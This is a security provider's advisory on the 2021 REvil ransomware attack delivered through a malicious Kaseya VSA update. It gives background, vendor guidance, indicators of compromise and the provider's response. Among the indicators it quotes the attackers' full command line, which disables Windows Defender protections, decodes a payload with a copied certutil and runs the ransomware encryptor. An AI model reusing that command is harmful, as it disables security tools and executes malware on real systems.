REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update
Posted Date: 07/02/2021
Published Date: 07/02/2021
Sector: Information Technology & Information Security
DATE(S) ISSUED: 07/02/2021
SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group
“The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.
The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.
MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.
While at the time of writing, it is unclear how widespread the incident is, security firm Huntress Labs is reporting that at least four MSPs have been hit so far. However, VSA is also used by regular businesses to manage large computer fleets, meaning the incident is also most likely impacting non-MSP entities as well.
According to security firm Sophos, which has also detected the attack via its antivirus telemetry, victims appear to be getting infected with ransomware via a malicious update to Kaseya VSA on-prem servers that disables local antivirus solutions and then deploys a fake Windows Defender app that encrypts local files.”
“We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say "Kaseya has been hacked" without evidence.”
Kaseya's official recommendation is to: "IMMEDIATELY shutdown your VSA server until you receive further notice from us.
We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. Its critical that you do this immediately, because one of the first things the attacker does is shutoff administrative access to the VSA.”
SYSTEMS AFFECTED: Kaseya VSA Servers - Windows
Managed Service Providers (MSPs) or companies that provide remote IT services to other companies or access to remote systems are affected by this threat.
Kaseya VSA is also used by regular businesses that are sized medium and large. Meaning this attack is not limited to MSPs only, but non-MSP entities as well.
Here's validated indicators of compromise known at this time:
Ransomware encryptor is dropped to c:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix”
At least two tasks run the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Other possible Indicators of Compromise (IOCs) identified:
Rich PE header hash
PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Windows Control Panel Item (generic) (88.3%)
Win64 Executable (generic) (4.7%)
Win16 NE executable (generic) (2.2%)
Win32 Executable (generic) (2%)
OS/2 Executable (generic) (0.9%)
890.88 KB (912264 bytes)
The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.
At this time, we do not believe any of our customers utilizing Kaseya is compromised at this time. This conclusion is the result of threat hunting searches performed looking for the indicators of compromise listed above into each affected customer’s environment/security solutions CyFlare manages.
For our managed endpoint or SentinelOne MDR customers we have also implemented a global blacklist on one key IOC identified. We added the SHA1 Hash identified as the Kaseya VSA Ransomware Encryptor Hash to the blacklist.
As more details for this emerging threat arise through the Cyber community or through Kaseya notices, your SOC will continue to address. If there any further updates, or indication that one of our affected customers are compromise then we will engage you further immediately.
If you have any further questions, comments, or concerns regarding this threat then please do not hesitate in contacting your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.
Thank you for your cooperation